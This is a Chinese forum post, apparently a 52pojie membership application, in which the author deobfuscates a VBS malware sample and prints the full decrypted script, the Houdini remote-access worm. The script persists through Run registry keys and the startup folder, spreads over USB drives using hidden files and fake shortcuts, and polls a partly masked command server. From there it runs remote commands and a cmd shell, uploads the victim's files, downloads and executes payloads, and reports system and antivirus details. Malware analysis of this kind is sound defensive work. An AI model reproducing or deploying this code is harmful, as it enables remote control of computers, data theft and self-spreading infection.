申请会员 id:smldhz【申请通过】
1、申 请 I D:smldhz2、个人邮箱:
3、原创技术文章:
看到这个帖子https://www.52pojie.cn/thread-716901-1-1.html,想回复发现以前账号早就没了。这里写一下分析过程,能搞个账号最好,不能的话 @你有毒吧 童鞋来这里看分析吧。
首先下载vbs脚本 vscode打开,能看到的是一堆“乱码“,不过也有一定的规律。既然能正常执行,那么肯定至少格式是正确的,搜索冒号":"替换为换行"\n",能让代码看起来稍微清爽一点
然后搜索"(",能找到几处函数和调用,贴一下关键地方
Ai4R2j1Q2k3P5l7O8m6N4n3M2=split(Ai4R2j1Q2k3P5l7O8m6N4n3M2,"8-f��A��**�����?��?��?�������?���?227596903�???��?�?/R8-f��A��**��297575474���?���?�???��?����?���?�???�259122682?���?�???��?�?/R8-")
for A5l7O8=0 to ubound(Ai4R2j1Q2k3P5l7O8m6N4n3M2) -1
A1d2W3e4V5f6U7g5T4h8S9i=A1d2W3e4V5f6U7g5T4h8S9i & ChrW(Ai4R2j1Q2k3P5l7O8m6N4n3M2(A5l7O8))
next
把Ai4R2j1Q2k3P5l7O8m6N4n3M2字符串用后面的一长串字符来分割,得到的数字转成字符拼接到一起,按这个逻辑跑一遍 得到
nTWAAKaqMncGOLE = "KcSqLBYLmrPGgXL" + ChrW(160)
Public Function YPcXDTqcWJAjkyz(NMWZrwnYxTfZmaV , ffLzcAEAXYFzttk )
For GGoBjvuWeIryKEA = ChrW(40 + 9) TO (sjDhJwZgbCUrTGO(ffLzcAEAXYFzttk) / ChrW(25 + 25))
rjjHfVnrNbUrHmS = IzPqzmyebBLAxJy(ChrW(30 + 8 )& ChrW(70 + 2) + (MID(ffLzcAEAXYFzttk, (ChrW(40 + 10) * GGoBjvuWeIryKEA) - ChrW(40 + 9), ChrW(60 -10))))
SJDGzcxYdFDRtJy = ASC(MID(NMWZrwnYxTfZmaV, ((GGoBjvuWeIryKEA Mod sjDhJwZgbCUrTGO(NMWZrwnYxTfZmaV)) & ChrW(40 +9)), ChrW(40 + 9)))
if nTWAAKaqMncGOLE ="KcSqLBYLmrPGgXL" + ChrW(160) then
jUtslSFfKIqWNav = jUtslSFfKIqWNav + ChrW(rjjHfVnrNbUrHmS XoR SJDGzcxYdFDRtJy)
end if
Next
YPcXDTqcWJAjkyz = jUtslSFfKIqWNav
End Function
Function IzPqzmyebBLAxJy (CcRvOWqsCUejGXf)
IzPqzmyebBLAxJy = Eval (CcRvOWqsCUejGXf)
end Function
Function sjDhJwZgbCUrTGO (MloZCRGnuGUMUHS)
sjDhJwZgbCUrTGO = Len (MloZCRGnuGUMUHS)
end Function
if nTWAAKaqMncGOLE ="KcSqLBYLmrPGgXL" + ChrW(160) then
nFattSGfzkORuQE = ""
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
nFattSGfzkORuQE = nFattSGfzkORuQE & "xxxx"
Wscript.Sleep 1000
Execute (YPcXDTqcWJAjkyz ( ChrW(63),nFattSGfzkORuQE))
dIm nsTeqFJRvCeWtsf
end if
篇幅关系把nFattSGfzkORuQE 后面的一堆hex字符用xxxx代替了
看到有个Execute,说明至少解密了一层了,要继续解密得先用YPcXDTqcWJAjkyz函数解一层,直接把execute替换成写文件
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile ("output.vbs", 2, True)
objTextFile.Write (YPcXDTqcWJAjkyz ( ChrW(63),nFattSGfzkORuQE))
objTextFile.close()
打开output.vbs发现已经是解密完了,原始文件前前后后那么多的 随机字符串=随机字符串 只是掩护罢了,并没有实际作用的样子。
附上解密完的脚本
'<[ recoder : houdini (c) skype : houdini-fx ]>
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
host = "txxxxtno.publicvm.com"
port = 5054
installdir = "%appdata%"
lnkfile = true
lnkfolder = true
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")
'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) theninstalldir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce
'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next
instance
while true
install
response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce =filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
case "recv"
param = cmd (1)
upload (param)
case"enum-driver"
post "is-enum-driver",enumdriver
case"enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case"enum-process"
post "is-enum-process",enumprocess
case"cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case"delete"
param = cmd (1)
deletefaf (param)
case"exit-process"
param = cmd (1)
exitprocess (param)
case"sleep"
param = cmd (1)
sleep = eval (param)
end select
wscript.sleep sleep
wend
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon
upstart
for each drive in filesystemobj.drives
ifdrive.isready = true then
ifdrive.freespace> 0 then
ifdrive.drivetype= 1 then
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
iffilesystemobj.fileexists (drive.path & "\" & installname)then
filesystemobj.getfile(drive.path & "\"& installname).attributes = 2+4
end if
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
if not lnkfile then exit for
ifinstr (file.name,".") then
iflcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 2+4
ifucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\"& filename (0) & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
ifinstr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\"& foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
ifinstr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
sub uninstall
on error resume next
dim filename
dim foldername
shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
foreach drive in filesystemobj.drives
ifdrive.isready = true then
ifdrive.freespace> 0 then
ifdrive.drivetype= 1 then
foreach file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
ifinstr (file.name,".") then
iflcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 0
ifucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
function post (cmd ,param)
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
function information
on error resume next
ifinf = "" then
inf = hwid & spliter
inf = inf& shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf& shellobj.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function
sub upstart ()
on error resume Next
shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),"wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),"wscript.exe //B "& chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
end sub
function hwid
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
ifdisk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function
function security
on error resume next
security = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
forx = 1 to ubound (versionstr)
osversion = osversion &versionstr (i)
next
osversion = eval (osversion)
ifosversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
for each objantivirus in colantivirus
security= security& objantivirus.displayname & " ."
next
if security= "" then security= "nan-av"
end function
function instance
on error resume next
usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
if lcase ( mid(wscript.scriptfullname,2)) = ":\" &lcase(installname) then
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)& "\",usbspreading, "REG_SZ"
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)& "\",usbspreading, "REG_SZ"
end if
end If
upstart
set scriptfullnameshort =filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =filesystemobj.getfile (installdir & installname)
iflcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
iferr.number > 0 then wscript.quit
end function
sub sitedownloader (fileurl,filename)
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send
set objfsodownload = createobject ("scripting.filesystemobject")
ifobjfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dimobjstreamdownload
setobjstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
sub download (fileurl,filedir)
if filedir = "" then
filedir = installdir
end if
strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
set objfsodownload = createobject ("scripting.filesystemobject")
ifobjfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
ifobjhttpdownload.status = 200 then
dimobjstreamdownload
setobjstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload= nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
function upload (fileurl)
dimhttpobj,objstreamuploade,buffer
setobjstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
function enumdriver ()
foreach drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function
function enumfaf (enumdir)
enumfaf = enumdir & spliter
foreach folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next
foreach file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size& "|" & "f" & "|" & file.attributes & spliter
next
end function
function enumprocess ()
on error resume next
set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)
dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
sub deletefaf (url)
on error resume next
filesystemobj.deletefile url
filesystemobj.deletefolder url
end sub
function cmdshell (cmd)
dim httpobj,oexec,readallfromany
set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if
cmdshell = readallfromany
end function
一个年代非常久远的vbs恶意代码,运行后连接txxxxtno.publicvm.com 获取进一步操作命令。百度搜索第一行的文字('<[ recoder : houdini (c) skype : houdini-fx ]>)可以看到有很多分析,这里就不继续了
I D:smldhz
邮箱:smldhz@qq.com
申请通过,欢迎光临吾爱破解论坛,期待吾爱破解有你更加精彩,ID和密码自己通过邮件密码找回功能修改,请即时登陆并修改密码!
登陆后请在一周内在此帖报道,否则将删除ID信息。
ps:登录后可以把文章整理到病毒分析区。 报道报道,感谢通过:lol @Hmily 是否可以隐藏邮箱信息,麻烦了
页:
[1]